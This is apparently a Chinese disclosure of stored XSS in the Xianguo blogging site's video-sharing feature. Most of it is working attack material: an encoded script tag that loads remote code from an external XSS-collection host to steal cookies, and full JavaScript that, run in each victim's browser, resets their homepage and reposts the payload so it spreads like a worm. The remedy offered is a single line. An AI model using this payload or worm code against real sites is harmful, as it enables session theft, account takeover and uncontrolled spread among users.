鲜果日志里面的分享视频和音乐中，可以通过插入一些跨站代码来实现XSS的效果，详见证明。

对用户进行持久控制，可以通过发一条含有跨站代码的日志，然后将鲜果社区设为我的鲜果首页，这样就可以实现对用户进行持久控制，这样用户每点登录一次鲜果就可以触发一次鲜果，一次又一次，一次又一次

演示地址：http://xianguo.com/1378148/
首先我们来到分享视频的地方，我们随便写一个视频 ，保存，截包。
在video这个地方会发现一个神奇的东西，

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D
进行一下URIComp解码

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}
看到了我们很熟悉的{}这种类型，弱弱的表示不懂的专业术语是什么.......
然后将我们的跨站代码进行Unicode编码
"><script src=http://xsser.me/pIQKKz></script>

\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E
然后将上面的编码插入到flash地址中

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}
进行URIComp编码

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D
然后替换掉原来的video中。

效果如下

COOKIES

其实拿到了COOKIES就可以登录了，但还是来说说持久控制。

var pkav={
  ajax:function(){
   var xmlHttp;
   try{
    xmlHttp=new XMLHttpRequest();
   }catch (e){
    try{
     xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
    }catch (e){
     try{
      xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
     }
     catch (e){
      return false;
     }
    }
   }
   return xmlHttp;
  },
  req:function(url,data,method,callback){
   method=(method||"").toUpperCase();
   method=method||"GET";
   data=data||"";
   if(url){
    var a=this.ajax();
    a.open(method,url,true);
    if(method=="POST"){
     a.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    }
    a.onreadystatechange=function(){
     if (a.readyState==4 && a.status==200)
     {
      if(callback){
       callback(a.responseText);
      }
     }
    };
    if((typeof data)=="object"){
     var arr=[];
     for(var i in data){
      arr.push(i+"="+encodeURIComponent(data[i]));
     }
     a.send(arr.join("&"));
    }else{
     a.send(data||null);
    }
   } www.2cto.com
  },
  get:function(url,callback){
   this.req(url,"","GET",callback);
  },
  post:function(url,data,callback){
   this.req(url,data,"POST",callback);
  }
 };
 if(!window.__x){
 pkav.post("http://xianguo.com/doings/sethome","type=snsSet",function(rs){});
 pkav.post("http://xianguo.com/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){});
   window.__x=1;
 }

第一个包是设置互动社区为首页
第二个包是发送一条微博

修复方案：加强过滤~~~~~~~~~

时间不足，不多打字了。。。